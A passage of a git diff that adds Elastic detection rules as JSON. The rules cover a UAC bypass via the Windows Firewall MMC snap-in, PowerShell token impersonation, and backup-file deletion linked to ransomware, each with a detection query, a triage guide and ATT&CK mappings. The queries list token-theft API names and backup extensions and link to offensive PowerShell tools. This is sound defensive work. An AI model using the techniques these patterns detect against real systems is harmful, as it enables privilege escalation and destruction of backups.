- https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_110.json b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_110.json new file mode 100644 index 00000000000..e666271d895 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_110.json @@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass via Windows Firewall Snap-In Hijack", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"mmc.exe\" and\n /* process.Ext.token.integrity_level_name == \"high\" can be added in future for tuning */\n /* args of the Windows Firewall SnapIn */\n process.parent.args == \"WF.msc\" and process.name != \"WerFault.exe\"\n", + "references": [ + "https://github.com/AzAgarampur/byeintegrity-uac" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + }, + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.014", + "name": "MMC", + "reference": "https://attack.mitre.org/techniques/T1218/014/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_111.json b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_111.json new file mode 100644 index 00000000000..6b964ffc445 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_111.json @@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass via Windows Firewall Snap-In Hijack", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"mmc.exe\" and\n /* process.Ext.token.integrity_level_name == \"high\" can be added in future for tuning */\n /* args of the Windows Firewall SnapIn */\n process.parent.args == \"WF.msc\" and process.name != \"WerFault.exe\"\n", + "references": [ + "https://github.com/AzAgarampur/byeintegrity-uac" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + }, + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.014", + "name": "MMC", + "reference": "https://attack.mitre.org/techniques/T1218/014/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_11.json b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_11.json new file mode 100644 index 00000000000..2ea3731da39 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_11.json @@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects scripts that contain PowerShell functions, structures, or Windows API functions related to token impersonation/theft. Attackers may duplicate then impersonate another user's token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Token Impersonation Capabilities", + "note": "## Triage and analysis\n\n### Investigating PowerShell Script with Token Impersonation Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAdversaries can abuse PowerShell to perform token impersonation, which involves duplicating and impersonating another user's token to escalate privileges and bypass access controls. This rule identifies scripts containing PowerShell functions, structures, or Windows API functions related to token impersonation/theft.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine PowerShell process creation and script block logs to identify command line arguments or hardcoded information that can indicate which user was the target of the impersonation.\n- Investigate any abnormal behavior by the subject process (PowerShell), such as network connections, registry or file modifications, and any spawned child processes.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Regular users should not need to impersonate other users, which makes false positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related Rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"Invoke-TokenManipulation\" or\n \"ImpersonateNamedPipeClient\" or\n \"NtImpersonateThread\" or\n (\n \"STARTUPINFOEX\" and\n \"UpdateProcThreadAttribute\"\n ) or\n (\n \"AdjustTokenPrivileges\" and\n \"SeDebugPrivilege\"\n ) or\n (\n (\"DuplicateToken\" or\n \"DuplicateTokenEx\") and\n (\"SetThreadToken\" or\n \"ImpersonateLoggedOnUser\" or\n \"CreateProcessWithTokenW\" or\n \"CreatePRocessAsUserW\" or\n \"CreateProcessAsUserA\")\n ) \n ) and\n not (\n user.id:(\"S-1-5-18\" or \"S-1-5-19\" or \"S-1-5-20\") and\n file.directory: \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\Downloads\"\n ) and\n not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\" and \"PowerSploitIndicators\"\n )\n", + "references": [ + "https://github.com/decoder-it/psgetsystem", + "https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/Get-System.ps1", + "https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-MS16032.ps1", + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "11dd9713-0ec6-4110-9707-32daae1ee68c", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.001", + "name": "Token Impersonation/Theft", + "reference": "https://attack.mitre.org/techniques/T1134/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 11 + }, + "id": "11dd9713-0ec6-4110-9707-32daae1ee68c_11", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_111.json b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_111.json new file mode 100644 index 00000000000..1044605661d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_111.json @@ -0,0 +1,112 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the deletion of backup files, saved using third-party software, by a process outside of the backup suite. Adversaries may delete Backup files to ensure that recovery from a ransomware attack is less likely.", + "false_positives": [ + "Certain utilities that delete files for disk cleanup or Administrators manually removing backup files." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Third-party Backup Files Deleted via Unexpected Process", + "note": "## Triage and analysis\n\n### Investigating Third-party Backup Files Deleted via Unexpected Process\n\nBackups are a significant obstacle for any ransomware operation. They allow the victim to resume business by performing data recovery, making them a valuable target.\n\nAttackers can delete backups from the host and gain access to backup servers to remove centralized backups for the environment, ensuring that victims have no alternatives to paying the ransom.\n\nThis rule identifies file deletions performed by a process that does not belong to the backup suite and aims to delete Veritas or Veeam backups.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- This rule can be triggered by the manual removal of backup files and by removal using other third-party tools that are not from the backup suite. Exceptions can be added for specific accounts and executables, preferably tied together.\n\n### Related rules\n\n- Deleting Backup Catalogs with Wbadmin - 581add16-df76-42bb-af8e-c979bfb39a59\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Perform data recovery locally or restore the backups from replicated copies (Cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"deletion\" and\n (\n /* Veeam Related Backup Files */\n (\n file.extension : (\"VBK\", \"VIB\", \"VBM\") and\n not (\n process.executable : (\"?:\\\\Windows\\\\*\", \"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\") and\n (process.code_signature.trusted == true and process.code_signature.subject_name : (\"Veeam Software Group GmbH\", \"Veeam Software AG\"))\n )\n ) or\n /* Veritas Backup Exec Related Backup File */\n (\n file.extension : \"BKF\" and\n not process.executable : (\n \"?:\\\\Program Files\\\\Veritas\\\\Backup Exec\\\\*\",\n \"?:\\\\Program Files (x86)\\\\Veritas\\\\Backup Exec\\\\*\"\n )\n )\n ) and\n not (\n process.name : (\"MSExchangeMailboxAssistants.exe\", \"Microsoft.PowerBI.EnterpriseGateway.exe\") and\n (process.code_signature.subject_name : \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) and\n not file.path : (\n \"?:\\\\ProgramData\\\\Trend Micro\\\\*\",\n \"?:\\\\Program Files (x86)\\\\Trend Micro\\\\*\",\n \"?:\\\\$RECYCLE.BIN\\\\*\"\n )\n", + "references": [ + "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + 